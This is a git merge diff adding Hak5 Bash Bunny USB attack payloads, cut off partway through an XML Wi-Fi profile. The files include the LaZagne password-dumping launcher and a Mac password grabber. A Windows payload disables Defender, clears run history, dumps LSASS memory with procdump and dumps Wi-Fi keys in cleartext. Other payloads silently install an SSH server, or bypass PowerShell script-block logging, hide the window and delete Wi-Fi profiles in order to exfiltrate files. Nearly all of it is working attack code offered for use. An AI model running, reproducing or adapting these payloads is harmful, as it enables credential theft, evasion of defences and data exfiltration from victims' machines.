Merge branch 'hak5:master' into master
commit
d9bdd824f1
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,238 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
# !/usr/bin/python
|
||||
|
||||
##############################################################################
|
||||
# #
|
||||
# By Alessandro ZANNI #
|
||||
# #
|
||||
##############################################################################
|
||||
|
||||
# Disclaimer: Do Not Use this program for illegal purposes ;)
|
||||
|
||||
import argparse
|
||||
import logging
|
||||
import sys
|
||||
import os
|
||||
import time
|
||||
|
||||
# Configuration
|
||||
from lazagne.config.write_output import write_in_file, StandardOutput
|
||||
from lazagne.config.manage_modules import get_categories
|
||||
from lazagne.config.constant import constant
|
||||
from lazagne.config.run import run_lazagne, create_module_dic
|
||||
|
||||
|
||||
# Object used to manage the output / write functions (cf write_output file)
|
||||
constant.st = StandardOutput()
|
||||
modules = create_module_dic()
|
||||
|
||||
|
||||
def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
|
||||
if output_dir:
|
||||
if os.path.isdir(output_dir):
|
||||
constant.folder_name = output_dir
|
||||
else:
|
||||
print('[!] Specify a directory, not a file !')
|
||||
|
||||
if txt_format:
|
||||
constant.output = 'txt'
|
||||
|
||||
if json_format:
|
||||
constant.output = 'json'
|
||||
|
||||
if all_format:
|
||||
constant.output = 'all'
|
||||
|
||||
if constant.output:
|
||||
if not os.path.exists(constant.folder_name):
|
||||
os.makedirs(constant.folder_name)
|
||||
# constant.file_name_results = 'credentials' # let the choice of the name to the user
|
||||
|
||||
if constant.output != 'json':
|
||||
constant.st.write_header()
|
||||
|
||||
|
||||
def quiet_mode(is_quiet_mode=False):
|
||||
if is_quiet_mode:
|
||||
constant.quiet_mode = True
|
||||
|
||||
|
||||
def verbosity(verbose=0):
|
||||
# Write on the console + debug file
|
||||
if verbose == 0:
|
||||
level = logging.CRITICAL
|
||||
elif verbose == 1:
|
||||
level = logging.INFO
|
||||
elif verbose >= 2:
|
||||
level = logging.DEBUG
|
||||
|
||||
formatter = logging.Formatter(fmt='%(message)s')
|
||||
stream = logging.StreamHandler(sys.stdout)
|
||||
stream.setFormatter(formatter)
|
||||
root = logging.getLogger()
|
||||
root.setLevel(level)
|
||||
# If other logging are set
|
||||
for r in root.handlers:
|
||||
r.setLevel(logging.CRITICAL)
|
||||
root.addHandler(stream)
|
||||
|
||||
|
||||
def manage_advanced_options(user_password=None, dictionary_attack=None):
|
||||
if user_password:
|
||||
constant.user_password = user_password
|
||||
|
||||
if dictionary_attack:
|
||||
constant.dictionary_attack = dictionary_attack
|
||||
|
||||
|
||||
def clean_args(arg):
|
||||
"""
|
||||
Remove not necessary values to get only subcategories
|
||||
"""
|
||||
for i in ['output', 'write_normal', 'write_json', 'write_all', 'verbose', 'auditType', 'quiet']:
|
||||
try:
|
||||
del arg[i]
|
||||
except Exception:
|
||||
pass
|
||||
return arg
|
||||
|
||||
|
||||
def runLaZagne(category_selected='all', subcategories={}, password=None, interactive=False):
|
||||
"""
|
||||
This function will be removed, still there for compatibility with other tools
|
||||
Everything is on the config/run.py file
|
||||
"""
|
||||
for pwd_dic in run_lazagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=password,
|
||||
interactive=interactive
|
||||
):
|
||||
yield pwd_dic
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
|
||||
parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
|
||||
help='laZagne version')
|
||||
|
||||
# ------------------------------------------- Permanent options ------------------------------------------
|
||||
# Version and verbosity
|
||||
PPoptional = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PPoptional._optionals.title = 'optional arguments'
|
||||
PPoptional.add_argument('-i', '--interactive', default=False, action='store_true',
|
||||
help='will prompt a window to the user')
|
||||
PPoptional.add_argument('-password', dest='password', action='store',
|
||||
help='user password used to decrypt the keychain')
|
||||
PPoptional.add_argument('-attack', dest='attack', action='store_true',
|
||||
help='500 well known passwords used to check the user hash (could take a while)')
|
||||
PPoptional.add_argument('-v', dest='verbose', action='count', help='increase verbosity level', default=0)
|
||||
PPoptional.add_argument('-quiet', dest='quiet', action='store_true',
|
||||
help='quiet mode: nothing is printed to the output', default=False, )
|
||||
|
||||
# Output
|
||||
PWrite = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PWrite._optionals.title = 'Output'
|
||||
PWrite.add_argument('-oN', dest='write_normal', action='store_true', help='output file in a readable format')
|
||||
PWrite.add_argument('-oJ', dest='write_json', action='store_true', help='output file in a json format')
|
||||
PWrite.add_argument('-oA', dest='write_all', action='store_true', help='output file in all format')
|
||||
PWrite.add_argument('-output', dest='output', action='store', help='destination path to store results (default:.)',
|
||||
default='.')
|
||||
|
||||
# -------------------------------- Add options and suboptions to all modules ------------------------------
|
||||
all_subparser = []
|
||||
categories = get_categories()
|
||||
for c in categories:
|
||||
categories[c]['parser'] = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
categories[c]['parser']._optionals.title = categories[c]['help']
|
||||
|
||||
# Manage options
|
||||
categories[c]['subparser'] = []
|
||||
for module in modules[c]:
|
||||
m = modules[c][module]
|
||||
categories[c]['parser'].add_argument(m.options['command'], action=m.options['action'], dest=m.options['dest'],
|
||||
help=m.options['help'])
|
||||
|
||||
# Manage all sub options by modules
|
||||
if m.suboptions:
|
||||
tmp = []
|
||||
for sub in m.suboptions:
|
||||
tmp_subparser = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
tmp_subparser._optionals.title = sub['title']
|
||||
if 'type' in sub:
|
||||
tmp_subparser.add_argument(sub['command'], type=sub['type'], action=sub['action'],
|
||||
dest=sub['dest'], help=sub['help'])
|
||||
else:
|
||||
tmp_subparser.add_argument(sub['command'], action=sub['action'], dest=sub['dest'],
|
||||
help=sub['help'])
|
||||
tmp.append(tmp_subparser)
|
||||
all_subparser.append(tmp_subparser)
|
||||
categories[c]['subparser'] += tmp
|
||||
|
||||
# ------------------------------------------- Print all -------------------------------------------
|
||||
parents = [PPoptional] + all_subparser + [PWrite]
|
||||
dic = {'all': {'parents': parents, 'help': 'Run all modules'}}
|
||||
for c in categories:
|
||||
parser_tab = [PPoptional, categories[c]['parser']]
|
||||
if 'subparser' in categories[c]:
|
||||
if categories[c]['subparser']:
|
||||
parser_tab += categories[c]['subparser']
|
||||
parser_tab += [PWrite]
|
||||
dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
|
||||
dic = dict(list(dic.items()) + list(dic_tmp.items()))
|
||||
|
||||
subparsers = parser.add_subparsers(help='Choose a main command')
|
||||
for d in dic:
|
||||
subparsers.add_parser(d, parents=dic[d]['parents'], help=dic[d]['help']).set_defaults(auditType=d)
|
||||
|
||||
# ------------------------------------------- Parse arguments -------------------------------------------
|
||||
|
||||
if len(sys.argv) == 1:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = dict(parser.parse_args()._get_kwargs())
|
||||
arguments = parser.parse_args()
|
||||
|
||||
# Define constant variables
|
||||
output(
|
||||
output_dir=args['output'],
|
||||
txt_format=args['write_normal'],
|
||||
json_format=args['write_json'],
|
||||
all_format=args['write_all']
|
||||
)
|
||||
verbosity(verbose=args['verbose'])
|
||||
manage_advanced_options(user_password=args.get('password', None), dictionary_attack=args.get('attack', None))
|
||||
quiet_mode(is_quiet_mode=args['quiet'])
|
||||
|
||||
# Print the title
|
||||
constant.st.first_title()
|
||||
|
||||
start_time = time.time()
|
||||
|
||||
category_selected = args['auditType']
|
||||
subcategories = clean_args(args)
|
||||
|
||||
for r in runLaZagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=args.get('password', None),
|
||||
interactive=arguments.interactive
|
||||
):
|
||||
pass
|
||||
|
||||
write_in_file(constant.stdout_result)
|
||||
constant.st.print_footer(elapsed_time=str(time.time() - start_time))
|
Binary file not shown.
|
@ -0,0 +1,44 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Mac Password Grabber
|
||||
# Author: Overtimedev
|
||||
# Version: 1.0
|
||||
#
|
||||
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
|
||||
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
|
||||
#
|
||||
# Amber..............Executing payload
|
||||
# Green..............Finished
|
||||
#
|
||||
|
||||
LED G R
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
lootdir=loot/MacPass
|
||||
mkdir -p /root/udisk/$lootdir
|
||||
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING cd /Volumes/BashBunny/
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING python get-pip.py
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING pip install -r requirements.txt
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
|
||||
QUACK ENTER
|
||||
QUACK DELAY 10000
|
||||
QUACK STRING killall Terminal
|
||||
QUACK ENTER
|
||||
|
||||
# Sync filesystem
|
||||
sync
|
||||
|
||||
# Green LED for finished
|
||||
LED G
|
|
@ -0,0 +1,25 @@
|
|||
# Mac Password Grabber for the BashBunny
|
||||
|
||||
* Author: Overtimedev
|
||||
* Version: Version 1.0
|
||||
* Target: OSX
|
||||
|
||||
## Description
|
||||
|
||||
Steals Mac Passwords using laZagne.py then stashes them in /loot/MacPass
|
||||
|
||||
|
||||
|
||||
1. put get-pip.py, laZagne.py and requirements.txt in the root folder of the bunny
|
||||
|
||||
2. unzip lazagne.zip into the root folder of the bunny
|
||||
|
||||
3. Replace PASSWORD, with your vicims mac computer password in payload.txt
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Amber | Executin Payload |
|
||||
| Green | Attack Finished |
|
|
@ -0,0 +1,8 @@
|
|||
psutil; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
secretstorage; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
pyasn1
|
||||
enum34; python_version < '3.4' and sys_platform == 'win32'
|
||||
rsa; sys_platform == 'win32'
|
||||
https://github.com/AlessandroZ/pypykatz/archive/master.zip; python_version < '3.4' and sys_platform == 'win32'
|
||||
https://github.com/skelsec/pypykatz/archive/master.zip; python_version > '3.5' and sys_platform == 'win32'
|
||||
pycryptodome
|
|
@ -0,0 +1,38 @@
|
|||
DELAY 5000
|
||||
GUI d
|
||||
DELAY 1200
|
||||
GUI r
|
||||
DELAY 1200
|
||||
STRING powershell -nologo -noni -ep bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 2000
|
||||
LEFT
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING mode con:cols=100 lines=1
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
|
||||
ENTER
|
||||
DELAY 35000
|
||||
STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING echo "Successful PWNd..."
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING eject
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING Set-MpPreference -DisableRealtimeMonitoring $false
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING exit
|
||||
ENTER
|
|
@ -0,0 +1,9 @@
|
|||
#!/bin/bash
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID VID_0X0D8C PID_0X0012
|
||||
LED ATTACK
|
||||
LED R B
|
||||
QUACK switch1/duck_code.txt
|
||||
sync;sleep 1;sync
|
||||
LED FINISH
|
||||
LED G
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,159 @@
|
|||
## ##
|
||||
## Ducked script by scaery v.1.0 ##
|
||||
## ________ __ .___ ##
|
||||
## \______ \ __ __ ____ | | __ ____ __| _/ ##
|
||||
## | | \| | \_/ ___\| |/ // __ \ / __ | ##
|
||||
## | ` \ | /\ \___| <\ ___// /_/ | ##
|
||||
## /_______ /____/ \___ >__|_ \\___ >____ | ##
|
||||
## \/ \/ \/ \/ \/ ##
|
||||
## ##
|
||||
## Windows Enumeration - LSASS Dump - Wifi Credential Dumper ##
|
||||
## ##
|
||||
####################################################################
|
||||
|
||||
$switch = "switch1"
|
||||
$usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name
|
||||
$usb_loot = "loot\"
|
||||
$date = Get-Date -UFormat "%Y-%m-%d-%H-%M"
|
||||
$loot = $usb + $usb_loot + $env:computername + "_" + $date
|
||||
$usb_create = New-Item -ItemType directory $loot
|
||||
$proc = "$usb\payloads\$switch\procdump.txt"
|
||||
$proc_decode = certutil -decode $proc exec.exe
|
||||
$procdump = "$usb\payloads\$switch\exec.exe"
|
||||
$proc_run = cmd.exe /c exec.exe -ma lsass.exe -accepteula "$loot\$date-lsass.$env:computername.dmp"
|
||||
$wifi = (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Out-File $loot\$date-wifidump.log
|
||||
|
||||
$lines="------------------------------------------"
|
||||
function whost($a) {
|
||||
Write-Host
|
||||
Write-Host -ForegroundColor Green $lines
|
||||
Write-Host -ForegroundColor Green " "$a
|
||||
Write-Host -ForegroundColor Green $lines
|
||||
}
|
||||
|
||||
whost "Windows Enumeration Script v 0.1
|
||||
original by absolomb
|
||||
modified by scaery
|
||||
!!!!!!!!!"
|
||||
|
||||
$commands = [ordered]@{
|
||||
'Basic System Information' = 'Start-Process "systeminfo" -NoNewWindow -Wait';
|
||||
'Environment Variables' = 'Get-ChildItem Env: | ft Key,Value';
|
||||
'Network Information' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
|
||||
'DNS Servers' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
|
||||
'ARP cache' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
|
||||
'Routing Table' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
|
||||
'Network Connections' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
|
||||
'Connected Drives' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
|
||||
'Firewall Config' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
|
||||
'Current User' = 'Write-Host $env:UserDomain\$env:UserName';
|
||||
'User Privileges' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
|
||||
'Local Users' = 'Get-LocalUser | ft Name,Enabled,LastLogon';
|
||||
'Logged in Users' = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
|
||||
'Credential Manager' = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
|
||||
'User Autologon Registry Items' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
|
||||
'Local Groups' = 'Get-LocalGroup | ft Name';
|
||||
'Local Administrators EN' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
|
||||
'Local Administrators DE' = 'Get-LocalGroupMember Administratoren | ft Name, PrincipalSource';
|
||||
'User Directories' = 'Get-ChildItem C:\Users | ft Name';
|
||||
'Searching for SAM backup files' = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
|
||||
'Running Processes' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
|
||||
'Installed Software Directories' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
|
||||
'Software in Registry' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
|
||||
'Folders with Everyone Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
|
||||
'Folders with BUILTIN\User Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
|
||||
'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
|
||||
'Unquoted Service Paths' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
|
||||
'Scheduled Tasks' = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
|
||||
'Tasks Folder' = 'Get-ChildItem C:\Windows\Tasks | ft';
|
||||
'Startup Commands' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
|
||||
}
|
||||
|
||||
function RunCommands($commands) {
|
||||
ForEach ($command in $commands.GetEnumerator()) {
|
||||
whost $command.Name
|
||||
Invoke-Expression $command.Value
|
||||
}
|
||||
}
|
||||
|
||||
# Disable Notifications
|
||||
|
||||
New-Item HKCU:\Software\Policies\Microsoft\Windows\Explorer -Force
|
||||
$registryPath1 = "HKCU:\Software\Policies\Microsoft\Windows\Explorer"
|
||||
$Name1 = "DisableNotificationCenter"
|
||||
$value1 = "00000001"
|
||||
IF(!(Test-Path $registryPath1)) {
|
||||
New-Item -Path $registryPath1 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance -Force
|
||||
$registryPath2 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance"
|
||||
$Name2 = "Enabled"
|
||||
$value2 = "00000000"
|
||||
IF(!(Test-Path $registryPath2)) {
|
||||
New-Item -Path $registryPath2 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel -Force
|
||||
$registryPath3 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
|
||||
$Name3 = "Enabled"
|
||||
$value3 = "00000000"
|
||||
IF(!(Test-Path $registryPath3)) {
|
||||
New-Item -Path $registryPath3 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay -Force
|
||||
$registryPath4 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay"
|
||||
$Name4 = "Enabled"
|
||||
$value4 = "00000000"
|
||||
IF(!(Test-Path $registryPath4)) {
|
||||
New-Item -Path $registryPath4 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
$notify_disable={
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
|
||||
}
|
||||
$notify_enable={
|
||||
Remove-Item $registryPath1 -Force | Out-Null
|
||||
Remove-Item $registryPath2 -Force | Out-Null
|
||||
Remove-Item $registryPath3 -Force | Out-Null
|
||||
Remove-Item $registryPath4 -Force | Out-Null
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 1
|
||||
}
|
||||
|
||||
##################### EXECUTION STEPS ######################################
|
||||
|
||||
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
|
||||
|
||||
Invoke-Command -Scriptblock $notify_disable
|
||||
|
||||
RunCommands($commands) > $loot\$date-winenum.log
|
||||
|
||||
whost "Procdump LSASS! AV-free! Caution: Not Defender aware!"
|
||||
$proc_run
|
||||
|
||||
whost "Dumping Wifi Credentials to USB"
|
||||
$wifi
|
||||
|
||||
whost "Hiding traces and notifications"
|
||||
Invoke-Command -Scriptblock $notify_enable
|
|
@ -0,0 +1,27 @@
|
|||
# Title: Win SSH server
|
||||
# Description: Installs and runs a SSH Server on Windows.
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Target: Windows 10 Creators Update (Powershell 5.1+)
|
||||
# Attackmodes: HID
|
||||
# Requirements: Admin Privileges and an Online Connection
|
||||
# Notes: Add ` -StartupType 'Automatic'` after Start-Service to start ssh on boot
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID
|
||||
|
||||
LED ATTACK
|
||||
Q DELAY 200
|
||||
# Admin Powershell need Windows 10 Creators Update
|
||||
Q GUI x
|
||||
Q STRING a
|
||||
sleep 2
|
||||
# Q ALT y this work for EN y=yes
|
||||
# This works for all languages
|
||||
Q LEFT
|
||||
Q ENTER
|
||||
sleep 5
|
||||
Q STRING "Get-WindowsCapability -Online | ? Name -like 'OpenSSH.Server*' | ? State -EQ 'NotPresent' | % {Add-WindowsCapability -Online -Name \$_.Name}; Start-Service sshd"
|
||||
# Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,27 @@
|
|||
# SSH server
|
||||
- Author: Cribbit
|
||||
- Version: 1.0
|
||||
- Target: Windows 10 Creators Update (Powershell)
|
||||
- Category: Execution
|
||||
- Attackmode: HID
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | --------------- |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Installs and runs a SSH Server on Windows.
|
||||
|
||||
## Notes
|
||||
This payload needs an admin powershell prompt and an internet connection to run.
|
||||
|
||||
## Configuration
|
||||
Add ` -StartupType 'Automatic'` after Start-Service to start ssh on boot.
|
||||
|
||||
## Colours
|
||||
| Status | Colour | Description |
|
||||
| -------- | ----------------------------- | --------------------------- |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISHED | Green blink followed by SOLID | Script is finished |
|
|
@ -0,0 +1,40 @@
|
|||
# Files Exfiltration with "SanDisk Wireless Stick"
|
||||
|
||||
- Title: "SanDisk Wireless Stick" Exfiltration
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows 10
|
||||
- Category: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
Uses the "SanDisk Wireless Stick" for files exfiltration.
|
||||
1) Avoids "PowerShell Script Block Logging".
|
||||
2) Hide "PowerShell" window.
|
||||
3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
|
||||
4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
|
||||
5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
|
||||
6) Exfiltration of the files via the HTTP channel.
|
||||
|
||||
## Configuration
|
||||
|
||||
In the web interface of the "SanDisk Wireless Stick" after update, change the following values :
|
||||
|
||||
![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png)
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
readonly SANDISK_SSID="HAK5-EXFIL"
|
||||
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
|
||||
readonly SANDISK_LOOT="loots"
|
||||
readonly USER_DIRECTORY="~\\"
|
||||
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
|
||||
|
||||
```
|
||||
|
||||
## Link
|
||||
[SanDisk Vendor](https://www.sandisk.com/goto/connect)
|
Binary file not shown.
After Width: | Height: | Size: 22 KiB |
|
@ -0,0 +1,159 @@
|
|||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
#
|
||||
|
||||
param (
|
||||
[string] $SSID,
|
||||
[string] $PSK,
|
||||
[string] $LOOT,
|
||||
[string] $DIRECTORY,
|
||||
[string] $EXTENSION
|
||||
)
|
||||
|
||||
# Avoids "PowerShell Script Block Logging".
|
||||
#
|
||||
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
||||
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
||||
$etw_provider.SetValue($null, $event_provider)
|
||||
|
||||
# Hide "PowerShell" window.
|
||||
#
|
||||
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
||||
[DllImport("user32.dll")]
|
||||
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
||||
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
||||
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
||||
|
||||
If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) {
|
||||
|
||||
# Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
|
||||
#
|
||||
$interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid
|
||||
If ($interface_guid) {
|
||||
$wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\"
|
||||
$wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse
|
||||
$wlan_service_items | ForEach-Object {
|
||||
[xml] $xml_content = Get-Content -Path $_.FullName
|
||||
$mode = $xml_content.WLANProfile.connectionMode
|
||||
$name = $xml_content.WLANProfile.name
|
||||
If ($mode -eq "auto") {
|
||||
(NETSH WLAN DELETE PROFILE name="$name") | Out-Null
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
# Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
|
||||
#
|
||||
$profile_guid = "{" + [guid]::NewGuid().ToString() + "}"
|
||||
$profile_path = "${env:TEMP}\${profile_guid}.xml"
|
||||
$ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) })
|
||||
@"
|
||||
<?xml version="1.0"?>
|
||||
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
|
||||
<name>${SSID}</name>
|
||||
<SSIDConfig>
|
||||
<SSID>
|
||||
<hex>${ssid_hex}</hex>
|
||||
<name>${SSID}</name>
|
||||
</SSID>
|
||||
</SSIDConfig>
|
||||
<connectionType>ESS</connectionType>
|
||||
<connectionMode>auto</connectionMode>
|
||||
<MSM>
|
||||
<security>
|
||||
<authEncryption>
|
||||
<authentication>WPA2PSK</authentication>
|
||||
<encryption>AES</encryption>
|
||||
<useOneX>false</useOneX>
|
||||
</authEncryption>
|
||||
<sharedKey>
|
